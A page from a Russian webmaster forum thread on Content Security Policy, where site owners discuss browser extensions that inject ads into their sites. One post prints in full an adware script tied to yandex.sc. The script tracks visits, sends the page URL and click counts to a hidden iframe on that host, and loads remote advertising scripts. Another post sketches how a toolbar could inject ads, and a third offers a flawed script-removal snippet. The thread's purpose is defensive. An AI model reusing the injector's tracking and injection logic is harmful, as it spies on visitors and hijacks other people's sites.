Форум Сайтостроение Безопасность

Настройка CSP - Content Security Policy

1 2345678910 ...101
C
На сайте с 07.05.2010
Offline
227
ctit ctit
#31
Оптимизайка:
А я наблюдаю, что data:text - скрипты рекламных сетей попандеров казино вулкан :)

Да, тоже нашел его (уже делаю заплатку). В его списке все сайты про казино и деньги.

LEOnidUKG
На сайте с 25.11.2006
Offline
1722
LEOnidUKG
#32

ИМХО как-то бесполезно обсуждать защиту, когда в соседних ветках толпами обсуждают: "download трафика". В котором явно есть и всякие тулбары и расширения для браузеров и т.п.

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/
N3
На сайте с 28.04.2014
Offline
98
Nam3D
#33
burunduk:
и как предлагаешь вычислить метку?

А теперь главный вопрос: зачем ее высчитывать?

Парсим

<div class="asd Loctyu">текст текст текст текст</div>
и заменяем на
<div class="asd Loctyu">код_плагина_с_рекламой</div>
и пусть твой скрипт на сайте сам высчитывает метки.
Неискоренимо нежелание пользоваться поисковыми системами - даже находясь на форуме о поисковых системах © Cell Влазить напрямую в базу — это невозможно © Игорь Белов, mchost.ru Если SeoPult купил ссылку - значит она "рабочая" © Nat_SeoPult
[Удален]
#34
Nam3D:
и пусть твой скрипт на сайте сам высчитывает метки.

ну он то метку знает

код_плагина_с_рекламой будет чистым текстом?

нет, тогда он будет удалён :)

N3
На сайте с 28.04.2014
Offline
98
Nam3D
#35
burunduk:
код_плагина_с_рекламой будет чистым текстом?

Еще раз...

Создаем список нужных сайтов, на сервере настраиваем парсер, который будет собирать метки для дивов с сайтов, после чего отдаем плагину уже готовый код рекламы с дивом и нужной меткой (они же доступны в исходном коде сайта и распарсить их не составит никакого труда), который заменит рекламу или вклинится куда-нибудь в код сайта, если не найдет блок рекламы.

Один фиг сейчас все эти плагины работают через прокладки и загружают рекламный код именно с них, а не пихают код напрямую. Так что добавить еще парсинг меток на сервере не такое уж сложное дело.

Так что увы... но для крупных порталов данная затея обречена на провал.

[Удален]
#36

Nam3D, ещё раз - без варианта, контроль происходит не на уровне конкретных тегов, а всех узлов dom, можно даже текстовые узлы контролировать ;)

и ещё изменение метки дело сервера при определении определённых условий, например, появление неизвестных переходов, причём это можно настроить автоматически (будут небольшие проблемы с кешированием, но они именно небольшие) :)

C
На сайте с 07.05.2010
Offline
227
ctit ctit
#37

Что касается http://yandex.sc

Вот его код. На первый взгляд типичный вирусняк, однако список ресурсов почему-то назван BlackList. Кто силен в js, подскажите. Пока удалил этот ресурс из списка CSP.


{function b(b){e.Debug&&console.log(b)}function d(a){b("get: "+a+" return "+localStorage[a]);
return localStorage[a]}

function a(a,d){b("set: "+a+" = "+d);
localStorage[a]=d}function g(){return(new Date).getTime()}function h(a,d,c){if(c){var e=document.createElement("div");
e.id=c;document.body.appendChild(e)}c=document.createElement("script");c.setAttribute("type","text/javascript");
c.setAttribute("src",a);document.body.appendChild(c);b("INJECT ADVERT SCRIPT: "+a);(function(){var a=0,c=
setInterval(function(){20<=a?(clearInterval(c),b("CLEAR_INTERVAL: MAX ITERATIONS"),e("document")):

(e(d)&&(clearInterval(c),b("CLEAR_INTERVAL: FOUND")),a++)},300),e=function(b){var a="document"==b?document:document.querySelector(b);if(a){var c=function(){f.contentWindow.postMessage({type:"advert-script-clicked"},"*");a.removeEventListener("mousedown",c)};a.addEventListener("mousedown",c);return!0}return!1}})()}

function k(b){b=Base64.encode(JSON.stringify(b));b=e.IframeSrc+"?q="+b;f=document.createElement("iframe");
f.setAttribute("src",b);f.setAttribute("width",0);
f.setAttribute("height",0);f.setAttribute("border",0);f.style.display="none";
document.body.appendChild(f)}
var f,e={BlackList:"список поисковиков список ресурсов миллионников далее список порно-ресурсов".split(" "), FirstDate:"_ci_first_date",LastDate:"_ci_last_date",Clicks:"_ci_clicks",DateInterval:2592E5,CheckDate:Date.parse("8/15/2014"),IframeSrc:"http://yandex.sc/v4/ci.iframe.html",Debug:0},l={increment:function(){var a=parseInt(localStorage[e.Clicks])||0;b("Clicks.increment OLD:"+a);localStorage[e.Clicks]=a+1},get:function(){return localStorage[e.Clicks]},set:function(b){localStorage[e.Clicks]=b}};

if(function(b){for(var a=0;a<e.BlackList.length;a++)if(0<=b.indexOf(e.BlackList[a]))return!0;return!1}(location.host))b("Blacklist");
else{b("Not Blacklist");l.increment();var g=g(),m=parseInt(d(e.LastDate))||0;d(e.FirstDate)||a(e.FirstDate,g);b("Now>CheckDate "+(g>=e.CheckDate));b("Now-lastDate>Inteval "+(g-m>=e.DateInterval));g>=e.CheckDate&&g-m>=e.DateInterval&&(l={FirstDate:d(e.FirstDate),LastDate:g,Clicks:l.get(),Url:location.href,Domain:location.host},k(l),b("Inject Iframe"));a(e.LastDate,g)}(function(){var a=c.addEventListener?"addEventListener":"attachEvent";(0,c[a])("attachEvent"==a?"onmessage":"message",function(a){a=
a.data;"advert-script-iframe"==a.type&&a.url?h(a.url,a.selector,a.append_id):"advert-script-log"==a.type&&a.log&&b(a.log)},!1)})()})
Mik Foxi
На сайте с 02.03.2011
Offline
1076
Mik Foxi
#38

ctit, ваша логика рвет шаблоны, код похож на вирус, потому разбаню я его...

Антибот, антиспам, веб файрвол, защита от накрутки поведенческих: https://antibot.cloud/ + партнерка, до 40$ с продажи.
C
На сайте с 07.05.2010
Offline
227
ctit ctit
#39
burunduk:
контролировать надо все элементы

А почему нельзя контролировать только <script>, <iframe>. Они же создают угрозу....

На мой взгляд этот код должен вполне спасать сайт.


function goodscript(s)
{
var del1 = [пропускать эти домены];
for (var i in del1)
{
if (s.indexOf(del1) + 1) return true;
}
return false;
}
function delscript()
{
var col=document.getElementsByTagName("script");
var ns=col.length;
for(i=0;i<ns;i++)
{
if (col && col.getAttribute("src") != null)
{
s1=col.getAttribute("src");
if ( goodscript(s1)==false )
{
col.InnerHtml="";col.setAttribute("src","");
col.parentNode.removeChild(col);
}
}
}
}
setInterval(delscript(), 1500);
Mik Foxi
На сайте с 02.03.2011
Offline
1076
Mik Foxi
#40

Если б я был тулбарщиком, я бы вставлял простой скрипт:

var str = document.getElementById("body").innerHTML;
document.getElementById("body").innerHTML = str.replace(/</body>/gi, 'моя реклама</body>');

и защищайте что угодно, реклама будет вставлена все равно причем не в контент ее встаивать. и выводить поверх всего, прижимая к нижнему краю или к верхнему, отодвинув весь контент сайта)

1 2345678910 ...101

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий